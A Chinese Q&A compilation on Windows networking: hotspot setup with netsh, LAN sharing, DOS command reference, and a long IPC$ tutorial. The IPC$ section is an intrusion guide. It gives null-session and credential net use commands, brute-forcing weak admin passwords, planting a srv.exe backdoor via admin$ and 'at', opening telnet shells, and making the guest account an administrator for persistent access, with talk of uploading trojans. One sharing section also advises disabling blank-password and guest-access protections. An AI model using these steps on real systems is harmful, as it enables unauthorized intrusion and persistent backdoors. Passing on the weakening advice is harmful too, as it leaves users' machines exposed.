你好:1、首先要確定筆記本電腦已經開啟了無線,點擊電腦桌面左下角的開始菜單,在菜單的搜索框中輸入cmd,然後在列表中找到處理程序cmd.exe,右擊選擇以管理員身份運行;
2、打開之後,在命令對話框中輸入命令:netsh wlan set hostednetwork mode=allow ssid=livdran2012
key=100100100,然後按回車,不需要關閉掉哦;
mode:是否啟用虛擬WiFi網卡,改為disallow則為禁止;
ssid:無線網名稱,推薦最好用英文。(這里以livdran2012為例,可自由設置);
key:無線網密碼,限定八個以上字元。(這里以100100100為例,可自由設置);
3、運行成功後,打開網路和共享中心,點擊窗口左側「更改適配器設置」;
4、進入適配器設置就會發現多出了一個網卡為「Microsoft Virtual WiFi Miniport
Adapter」的無線網路連接2,如果沒有,就嘗試更新無線網卡驅動,然後將無線網路連接2重命名為虛擬WiFi;
5、在網路連接里,右鍵單擊已連接到Internet的網路連接,選擇「屬性」→「共享」,然後在「允許其他網路用戶通過此計算機的Internet連接來連接(N)」前面打上勾,並在下拉菜單中選擇「虛擬WiFi」,然後點擊確定按鈕;
6、接著就會發現提供共享的網卡圖標旁會出現「共享的」字樣,表示「寬頻連接」已共享至「虛擬WiFi」;
7、然後,繼續在命令提示符中輸入:netsh wlan start hostednetwork,按回車鍵運行;
8、最後就可以看到虛擬WiFi的紅叉消失了,WiFi基站已組建好並啟動,用支持WiFi的設備搜索到自己建立的無線網路(如例中livdran2012),輸入自己設置的密碼(如例中100100100),就可共享上網了。
希望能幫助到你
② 筆記本電腦怎麼打開網路共享
新建一個網路連接。
這里以win7為例哈,xp微軟都已經放棄了,我就不在說了。首先在開始菜單搜索的地方輸入cmd找到命令提示符工具。不要使用win+R快捷鍵,win7是需要管理員運行DOS命令的。
共2圖>02
設置新的網路連接。
右擊剛剛搜索出來的程序,以管理員身份運行。這時會彈出一個提示框,單擊確定即可。
共2圖>03
在命令提示符工具中輸入一下的命令:
netsh wlan set hostednetwork mode=allow ssid=wlan key=12345678
side是你的網路名稱,自己隨意寫;key是密碼,這個就是你朋友連接你電腦時需要輸入的,也是自己隨意設置,不一定是12345678。你想設置成什麼就寫什麼。
>04
打開網路共享中心。
右擊右下角的網路圖標,選擇下面的網路共享中心單擊打開即可。進入後在左側的選項中有管理無線網路適配器,進入後就會看到有一個無線網路2的適配器。
>05
右擊你現在連接網路的適配器,就是裡面顯示已連接的那個,選擇屬性——共享,勾上「允許其他網路……設備連接(N)」並選擇剛剛建立的網路(虛擬wifi)。
>06
這時你會發現你的已連接的網路已經變成共享的了。
再次以管理員的身份運行CMD,輸入一下命令:
netsh wlan start hostednetwork 然後回車即可共享網路了。以後需要共享就直接輸入這句話就OK了。
>07
停止共享。
停止共享也很簡單,同樣以管理員身份運行CMD,然後將上面的話中的start改成stop 就OK了
③ 區域網共享設置好了我如何進入
1、兩台電腦需要處於同一個IP地址段內,電腦所需被共享的分區或文件夾,設置共享。
2、都使用最高許可權用戶,並設置一個進入桌面的密碼。
3、都設置同一個工作組
4、進入桌面後,在「運行」中輸入雙斜杠加IP地址 \\對方電腦的IP地址 然後回車
5、這就會打出該IP的電腦可以被共享的分區或文件區的對話框,按提示輸入對方電腦的用戶名和密碼(最高許可權用戶和進入桌面密碼)
就可以打開對方電腦共享了。。
④ 筆記本電腦怎麼共享無線網路wifi
筆記本設置wifi熱點目測是很多用戶的一大需求,將筆記本網路共享wifi熱點給自己的手機或者平板等移動設備使用是現在很多用戶手機免費上網的重要途徑,那麼怎麼讓筆記本變成無線熱點,共享wifi熱點呢,今天wifi共享大師教你如何使用筆記本設置WiFi熱點。
筆記本電腦設置wifi熱點教程:
目前使用筆記本設置wifi熱點的方法有兩種,一種是使用軟體共享WiFi熱點,比如wifi共享大師;第二種是通過筆記本自身的系統的功能虛擬無線網卡共享wifi熱點,比如win7,win8都可以手動設置WiFi熱點,不過每次都要設置一次,比較麻煩。
一.、使用軟體在筆記本電腦上共享wifi熱點:
網路wifi共享大師或者直接訪問wifi共享大師官網:http://wifi.ggsafe.com。在官網上下載wifi共享大師,在筆記本上安裝成功以後,運行wifi共享大師,進入界面以後,點擊立即創建wifi,創建成功以後,筆記本即可變為無線熱點,共享wifi了,十分的方便快捷,還能去手機視頻廣告。
二、win7筆記本設置wifi熱點(手動)教程:
1. 以管理員身份運行命令提示符
從開始菜單找到「命令提示符」,或直接鍵入cmd快速搜索,右鍵單擊它,選擇「以管理員身份運行」,在彈出的用戶控制窗口中單擊「是」。還有一種方法就是按住Ctrl和Shift鍵直接單擊該快捷方式,更簡單。
執行完以後我們會在網路適配器裡面看到一個「無線網路連接2「的虛擬網卡
Mode:是否啟用虛擬Wifi網卡,改為disallow則為禁用,虛擬網卡即會消失。
Ssid:指定無線網路的名稱,最好為英文。
Key:指定無線網路的密碼。該密碼用於對無線網進行安全的WPA2加密,能夠很好的防止被蹭網。
以上三個參數其實可以單獨使用,例如只使用 mode=disallow 可以直接禁用虛擬Wifi網卡。
3. 啟用「Internet連接共享(ICS)」
為了與其他計算機或設備共享已連接的互聯網,我們需要啟用「Internet連接共享」功能。打開「網路連接」窗口,右鍵單擊已連接到Internet的 網路連接,選擇「屬性」,切換到「共享」選項卡,選中其中的復選框,並選擇允許其共享Internet的網路連接在這里即我們的虛擬Wifi網卡。
確定之後,提供共享的網卡圖標旁會出現「已共享」標志,表示「Internet連接共享」向虛擬無線網卡開通了。
4. 開啟無線網路
繼續在命令提示符中運行以下命令:netsh wlan start hostednetwork,即可開啟我們之前設置好的無線網路(相當於打開路由器的無線功能。同理,將start改為stop即可關閉該無線網)。
可以看到,虛擬無線網卡已經開啟了我們所指定的無線網路,其IP地址等屬性是由「Internet連接共享」服務分配的。
⑤ win7怎麼開啟網路連接共享
一:必要點
1、需要是管理員許可權的帳戶
2、所有入網的計算機都要在相同的IP段,]
3、所有入網的計算機都要在相同的工作組
4、所有入網的計算機都要開啟來賓賬戶
5、打開Windows防火牆---例外---勾選 文件和列印機共享---確定---保存。
二:必須開啟的服務:開始 運行 services.msc:
將以下服務的[啟動類型]選為[自動],並確保[服務狀態]為[已啟動]
Server
Workstation
Computer Browser
DHCP Client
Remote Procere Call
Remote Procere Call (RPC) Locator
DNS Client
Function Discovery Resource Publication
UPnP Device Host
SSDP Discovery
TIP/IP NetBIOSHelper
三:基本設置
1.網路和共享中心---點擊 網路 右邊的 自定義---將網路類型設置為 專用網路
2.共享和發現---啟用 網路發現、文件共享、列印機共享。密碼保護的共享則可以設置為關閉。
3.訪問策略設置
運行---輸入secpol.msc回車,打開本地安全設置
安全設置----本地策略----安全選項
帳戶: 使用空白密碼的本地帳戶只允許進行控制台登錄,設置為 已禁用。
此選項默認為 已啟用。這是很關鍵的一步,因為很多人的電腦都是沒有加密碼的的。如果當前使用的帳號沒有密碼的話,只允許控制台登錄
網路訪問: 不允許 SAM 帳戶和共享的匿名枚舉] ,設置為 已禁用。
此選項默認為 已禁用。Windows 允許匿名用戶執行某些活動,如枚舉域帳戶和網路共享的名稱。這提供了方便,也帶來潛在的風險。有的ghost版本系統為了安全起見,將其設置為啟用,但這樣一來,區域網其它電腦就會無法查看你共享的內容了。
網路訪問: 本地帳戶的共享和安全模型,設置為 僅來賓。
安全設置---本地策略---用戶權利指派
從網路訪問此計算機: 查看有沒有本機來賓帳戶即guest,如果沒有就加上。
拒絕從網路訪問這台計算機:查看有沒有本機來賓帳戶名,如果有就刪除。
4. Win7系統文件共享設置
文件夾右鍵---共享---選擇要與其共享的用戶---點擊黑色的小三角箭頭---在下拉菜單中選擇---everyone(這個列表中的所有用戶)。
5.最好還得到網卡的TCP/IP設置里,WINS裡面打開TCP/IP上的NETBIOS啟用勾勾.
⑥ 怎麼在開始菜單的運行中,進行網路電腦中的共享
COPY命令啊
DOS 常用命令:
dir 列文件名 deltree 刪除目錄樹 cls 清屏 cd 改變當前目錄
拷貝文件 disk 復制磁碟 del 刪除文件 format 格式化磁碟
edit 文本編輯 mem 查看內存狀況 md 建立子目錄 move 移動文件、改目錄名
more 分屏顯示 type 顯示文件內容 rd 刪除目錄 sys 製作DOS系統盤
ren 改變文件名 x 拷貝目錄與文件 chkdsk 檢查磁碟 attrib 設置文件屬性
fdisk 硬碟分區 date 顯示及修改號期 label 設置卷標號 defrag 磁碟碎片整理
msd 系統檢測 path 設置搜尋目錄 share 文件共享 memmaker內存優化管理
help 幫助 restore 恢復備份文件 set 設置環境變數 time 顯示及修改時間
tree 列目錄樹 debug 隨機調試程序 doskey 重新調用DOS命令 prempt 設置提示符 undelete恢復被刪的文件 scandisk檢測、修理磁碟
不常用DOS命令
diskcomp磁碟比較 append 設置非執行文件路徑
expand 還原DOS文件 fasthelp快速顯示幫助信息
fc 文件比較 interink啟動伺服器
setver 設置版本 intersvr啟動客戶機
subst 路徑替換 qbasic Basic集成環境
vsafe 防病毒 unformat恢復已格式化的磁碟
ver 顯示DOS版本號 smartdrv設置磁碟加速器
vol 顯示磁碟卷標號 lh 將程序裝入高端內存
ctty 改變控制設備 emm386 擴展內存管理
常用命令具體介紹:
一、Dir
顯示目錄文件和子目錄列表,呵呵,這個當然是人人要知道的。
可以使用通配符(? 和 *),?表通配一個字元,*表通配任意字元
*.後綴
指定要查看後綴的文件。 上面其實也可以為「 . 後綴」,例如dir *.exe 等於dir .exe
/p
每次顯示一個列表屏幕。要查看下一屏,請按鍵盤上的任意鍵。
/w
以寬格式顯示列表,在每一行上最多顯示 5 個文件名或目錄名。
/s
列出指定目錄及所有子目錄中出現的每個指定的文件名。比win環境下的查找快多了
dir *.* -> a.txt 把當前目錄文件列表寫入a.txt
dir *.* /s -> a.txt 把當前目錄文件列表寫入a.txt,包括子目錄下文件。
二、Attrib
顯示、設置或刪除指派給文件或目錄的只讀、存檔、系統以及隱藏屬性。如果在不含參數的情況下使用,則 attrib 會顯示當前目錄中所有文件的屬性。
+r
設置只讀屬性。
-r
清除只讀屬性。
+a
設置存檔文件屬性。
-a
清除存檔文件屬性。
+s
設置系統屬性。
-s
清除系統屬性。
+h
設置隱藏屬性。
-h
清除隱藏屬性。
三、Cls
清除顯示在命令提示符窗口中的所有信息,並返回空窗口,即「清屏」
四、Exit
退出當前命令解釋程序並返回到系統。
五、format
格式化
/q
執行快速格式化。刪除以前已格式化卷的文件表和根目錄,但不在扇區之間掃描損壞區域。使用 /q 命令行選項應該僅格式化以前已格式化的完好的卷。
六、Ipconfig
顯示所有當前的 TCP/IP 網路配置值、刷新動態主機配置協議 (DHCP) 和域名系統 (DNS) 設置。使用不帶參數的 ipconfig 可以顯示所有適配器的 IP 地址、子網掩碼、默認網關。
/all
顯示所有適配器的完整 TCP/IP 配置信息。
ipconfig 等價於 winipcfg,後者在ME、98 和 95 上可用。盡管 Windows XP 沒有提供象 winipcfg 命令一樣的圖形化界面,但可以使用「網路連接」查看和更新 IP 地址。要做到這一點,請打開 網路連接,右鍵單擊某一網路連接,單擊「狀態」,然後單擊「支持」選項卡。
該命令最適用於配置為自動獲取 IP 地址的計算機。它使用戶可以確定哪些 TCP/IP 配置值是由 DHCP、自動專用 IP 地址 (APIPA) 和其他配置配置的。
七、md
創建目錄或子目錄
八、Move
將一個或多個文件從一個目錄移動到指定的目錄。
九、Nbtstat
顯示本地計算機和遠程計算機的基於 TCP/IP (NetBT) 協議的 NetBIOS 統計資料、NetBIOS 名稱表和 N
etBIOS 名稱緩存。Nbtstat 可以刷新 NetBIOS 名稱緩存和注冊的 Windows Internet 名稱服務 (WINS) 名稱。使用不帶參數的 nbtstat 顯示幫助。Nbtstat 命令行參數區分大小寫。
-a remotename
顯示遠程計算機的 NetBIOS 名稱表,其中,RemoteName 是遠程計算機的 NetBIOS 計算機名稱。
-A IPAddress
顯示遠程計算機的 NetBIOS 名稱表,其名稱由遠程計算機的 IP 地址指定(以小數點分隔)。
十、Netstat
顯示活動的 TCP 連接、計算機偵聽的埠、乙太網統計信息、IP 路由表、IPv4 統計信息(對於 IP、ICMP、TCP 和 UDP 協議)以及 IPv6 統計信息(對於 IPv6、ICMPv6、通過 IPv6 的 TCP 以及通過 IPv6 的 UDP 協議)。使用時如果不帶參數,netstat 顯示活動的 TCP 連接。
-a
顯示所有活動的 TCP 連接以及計算機偵聽的 TCP 和 UDP 埠。
十一、Ping
通過發送「網際消息控制協議 (ICMP)」回響請求消息來驗證與另一台 TCP/IP 計算機的 IP 級連接。回響應答消息的接收情況將和往返過程的次數一起顯示出來。Ping 是用於檢測網路連接性、可到達性和名稱解析的疑難問題的主要 TCP/IP 命令。如果不帶參數,ping 將顯示幫助。名稱和Ip地址解析是它的最簡單應用也是用的最多的。
-t
指定在中斷前 ping 可以持續發送回響請求信息到目的地。要中斷並顯示統計信息,請按 CTRL-BREAK。要中斷並退出 ping,請按 CTRL-C。
-lSize
指定發送的回響請求消息中「數據」欄位的長度(以位元組表示)。默認值為 32。size 的最大值是 65,527。
十二、Rename (Ren)
更改文件的名稱。
例如 ren *.abc *.cba
十三、Set
顯示、設置或刪除環境變數。如果沒有任何參數,set 命令將顯示當前環境設置。
十四、Shutdown
允許您關閉或重新啟動本地或遠程計算機。如果沒有使用參數,shutdown 將注銷當前用戶。
-m ComputerName
指定要關閉的計算機。
-t xx
將用於系統關閉的定時器設置為 xx 秒。默認值是 20 秒。
-l
注銷當前用戶,這是默認設置。-m ComputerName 優先。
-s
關閉本地計算機。
-r
關閉之後重新啟動。
-a
中止關閉。除了 -l 和 ComputerName 外,系統將忽略其它參數。在超時期間,您只可以使用 -a。
十五、System File Checker (sfc)
win下才有,在重新啟動計算機後掃描和驗
證所有受保護的系統文件。
/scannow
立即掃描所有受保護的系統文件。
/scanonce
一次掃描所有受保護的系統文件。
/purgecache
立即清除「Windows 文件保護」文件高速緩存,並掃描所有受保護的系統文件。
/cachesize=x
設置「Windows 文件保護」文件高速緩存的大小,以 MB 為單位。
十六、type
顯示文本文件的內容。使用 type 命令查看文本文件或者是bat文件而不修改文件
十七、Tree
圖像化顯示路徑或驅動器中磁碟的目錄結構。
十八、X
復制文件和目錄,包括子目錄。
/s
復制非空的目錄和子目錄。如果省略 /s,x 將在一個目錄中工作。
/e
復制所有子目錄,包括空目錄。
十九、
將一個或多個文件從一個位置復制到其他位置
二十、del
刪除指定文件。
ftp和bat批命令和net和telnet由於子命令太多,這里不說了,不過這幾個都是常用到的。
IPC$命令詳解:
網上關於ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,因此也沒人願意再把這已經成為定式的東西拿出來擺弄.
不過話雖這樣說,但我個人認為這些文章講解的並不詳細,對於第一次接觸ipc$的菜鳥來說,簡單的羅列步驟並不能解答他們的許多迷惑(你隨便找一個hack論壇搜一下ipc,看存在的疑惑有多少).
因此我寫了這篇相當於解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請馬上回復!
二 什麼是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這么說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的許可權,在遠程管理計算機和查看計算機的共享資源時使用。
利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。
我們總在說ipc$漏洞ipc$漏洞,其實,ipc$並不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網路登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
所有的這些,初衷都是為了方便管理員的管理,但好的初衷並不一定有好的收效,一些別有用心者(到底是什麼用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,並使用一些字典工具,進行密碼探測,寄希望於獲得更高的許可權,從而達到不可告人的目的.
解惑:
1)IPC連接是Windows NT及以上系統中特有的遠程網路登陸功能,其功能相當於Unix中的Telnet,由於IPC$功能需要用到Windows NT中的很多DLL函數,所以不能在Windows 9.x中運行。
也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的)
2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接
3)並不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導出用戶列表
三 建立ipc$連接在hack攻擊中的作用
就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有
一定許可權的用戶身份登陸的話,那麼你就會得到相應的許可權,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!
(基本上可以總結為獲取目標信息、管理目標進程和服務,上傳木馬並運行,如果是2000server,還可以考慮開啟終端服務方便控制.怎麼樣?夠厲害吧!)
不過你也不要高興的太早,因為管理員的密碼不是那麼好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數,而且現在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的:(
因此今後你最大的可能就是以極小的許可權甚至是沒有許可權進行連接,你會慢慢的發現ipc$連接並不是萬能的,甚至在主機不開啟ipc$共享時,你根本就無法連接.
所以我認為,你不要把ipc$入侵當作終極武器,不要認為它戰無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.
四 ipc$與空連接,139,445埠,默認共享的關系
以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)
1)ipc$與空連接:
不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.
許多人可能要問了,既然可以空連接,那我以後就空連接好了,為什麼還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何許可權(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的許可權(有許可權誰不想呀,所以還是老老實實掃吧,不要偷懶喲).
2)ipc$與139,445埠:
ipc$連接可以實現遠程登陸及對默認共享的訪問;而139埠的開啟表示netbios協議的應用,我們可以通過139,445(win2000)埠實現對共享文件/列印機的訪問,因此一般來講,ipc$連接是需要139或445埠來支持的.
3)ipc$與默認共享
默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)
五 ipc$連接失敗的原因
以下5個原因是比較常見的:
1)你的系統不是NT或以上****作系統;
2)對方沒有打開ipc$默認共享
3)對方未開啟139或445埠(惑被防火牆屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯誤(空連接當然無所謂了)
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
關於ipc$連不上的問題比較復雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細而確定的說明,就*大家自己體會和試驗了.
<br>六 如何打開目標的IPC$(此段引自相關文章)
首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、木馬,當然,這shell必須是admin許可權的,然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上面可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎麼做的請看net命令的用法),還是不行的話(比如有防火牆,殺不了)建議放棄。
七 如何防範ipc$入侵
1禁止空連接進行枚舉(此****作並不能阻止空連接的建立,引自《解剖win2000下的空會話》)
首先運行regedit,找到如下組建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設置為2的話,有一些問題會發生,比如一些WIN的服務出現問題等等)
2禁止默認共享
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(每次輸入一個)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續刪除)
3)停止server服務
net stop server /y (重新啟動後server服務會重新開啟)
4)修改注冊表
運行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建(右擊-新建-雙位元組值)一個主健再改鍵值。
3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務
控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動類型-已禁用
4安裝防火牆(選中相關設置),或者埠過濾(濾掉139,445等),或者用新版本的優化大師
5設置復雜密碼,防止通過ipc$窮舉密碼
八 相關命令
1)建立空連接:
net use $">\\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
2)建立非空連接:
net use $">\\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
3)映射默認共享:
net use z: $">\\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: $">\\IP\c$
4)刪除一個ipc$連接
net&nbs
p;use $">\\IP\ipc$ /del
5)刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
九 經典入侵模式
這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)
11. C:\>net use $">\\127.0.0.1\IPC$ "密碼" /user:"用戶名"
一般用流光,通過掃描弱口令來得到,管理員帳號和密碼.
2. C:\> srv.exe $">\\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2004/6/15 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2004/6/15 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe $">\\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,****作就像在DOS上****作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)
ipc$常見問題:
1,怎樣建立空連接,它有什麼用?
答:使用命令 net use \IPipc$ "" /user:"" 就可以簡單地和目標建立一個空連接(需要目標開放ipc$)。
對於NT,在默認安全設置下,藉助空連接可以列舉目標用戶、共享,訪問everyone許可權的共享,訪問小部分注冊表等,沒有什麼利用價值。對2000作用就更小了。而且實現也不方便,需藉助工具。
2.為什麼我連不上IPC$?
答:1.只有nt/2000/xp及以上系統才可以建立ipc$。如果你用的是98/me是沒有該功能的。
2.確認你的命令沒有打錯。正確的命令是: net use \目標IPipc$ "密碼" /user:"用戶名"
注意別多了或少了空格。當用戶名和密碼中不包含空格時兩邊的雙引號可以省略。空密碼用""表示。
3,根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
4,關於ipc$連不上的問題比較復雜,沒有總結出一個統一的認識,在肉雞上實驗有時會得出矛盾的結論,十分棘手。 而且知道了問題所在,如果沒有用其他辦法獲得shell,很多問題依然不能解決。
5,怎樣打開目標的IPC$?
答:首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、木馬。當然,這shell必須是admin許可權的。然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上一問題可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎麼做的請看net命令的用法)。還是不行的話(比如有防火牆,殺不了)建議放棄。
6,怎樣映射和訪問默認共享?
答:使用命令 net use z: \目標IPc$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤,其他盤類推。
如果已經和目標建立了ipc$,則可以直接用IP加盤符加$訪問。比如 muma.exe \IPd$pathmuma.exe 。或者再映射也可以,只是不用用戶名和密碼了:net use y: \IPd$ 。然後 muma.exe y:pathmuma.exe 。當路徑中包含空格時,須用""將路徑全引住。
7,如何刪除映射和ipc$連接?
答:用命令 net use \IPipc$ /del 刪除和一個目標的ipc$連接。
用命令 net use z: /
del 刪除映射的z盤,其他盤類推。
用命令 net use * /del 刪除全部。會有提示要求按y確認。
8,連上ipc$然後我能做什麼?
答:能使用管理員許可權的帳號成功和目標連接ipc$,表示你可以和對方系統做深入「交流」了。你可以使用各種命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)獲得目標信息、管理目標的進程和服務等。如果目標開放了默認共享(沒開你就幫他開),你就可以上傳木馬並運行。也可以用tftp、ftp的辦法上傳。像dwrcc、VNC、RemoteAdmin等工具(木馬)還具有直接控屏的功能。如果是2000server,還可以考慮開啟終端服務方便控制。這里提到的工具的使用,請看自帶的說明或相關教程。
9,怎樣防止別人用ips$和默認共享入侵我?
答:A、一種辦法是把ipc$和默認共享都刪除了。但重起後還會有。這就需要改注冊表。
1,先把已有的刪除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有幾個刪幾個)
2,禁止別人空連接
首先運行regedit,找到如下主鍵[HKEY_LOCAL_]把RestrictAnonymous(DWORD)的鍵值改為:00000002。
3,禁止自動打開默認共享
對於server版,找到如下主鍵[HKEY_LOCAL_]把AutoShareServer(DWORD)的鍵值改為:00000000。
對於pro版,則是[HKEY_LOCAL_]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建一個再改鍵值。
B、另一種是關閉ipc$和默認共享依賴的服務(不推薦)
net stop lanmanserver
可能會有提示說,XXX服務也會關閉是否繼續。因為還有些次要的服務依賴於lanmanserver。一般情況按y繼續就可以了。
C、最簡單的辦法是設置復雜密碼,防止通過ipc$窮舉密碼。但如果你有其他漏洞,ipc$將為進一步入侵提供方便。
D、還有一個辦法就是裝防火牆,或者埠過濾。
⑦ win7系統如何打開wifi共享
設置如下:
1、以管理員身份運行命令提示符:
快捷鍵win+R→輸入cmd→回車
2、啟用並設定虛擬WiFi網卡:
運行命令:netsh
wlan
set
hostednetwork
mode=allow
ssid=yuchi
key=123
此命令有三個參數,mode:是否啟用虛擬WiFi網卡,改為disallow則為禁用。
ssid:無線網名稱,最好用英文(以yuchi為例,可自己另外取名)。
key:無線網密碼,八個以上字元(以yuchiWiFi為例,可自己設置自己熟悉的密碼)。
以上三個參數可以單獨使用,例如只使用mode=disallow可以直接禁用虛擬Wifi網卡。
開啟成功後,網路連接中會多出一個網卡為「Microsoft
Virtual
WiFi
Miniport
Adapter」的無線連接2,為方便起見,將其重命名為虛擬WiFi。若沒有,只需更新無線網卡驅動就OK了。
3、設置Internet連接共享:
在「網路連接」窗口中,右鍵單擊已連接到Internet的網路連接,選擇「屬性」→「共享」,勾上「允許其他······連接(N)」並選擇「虛擬WiFi
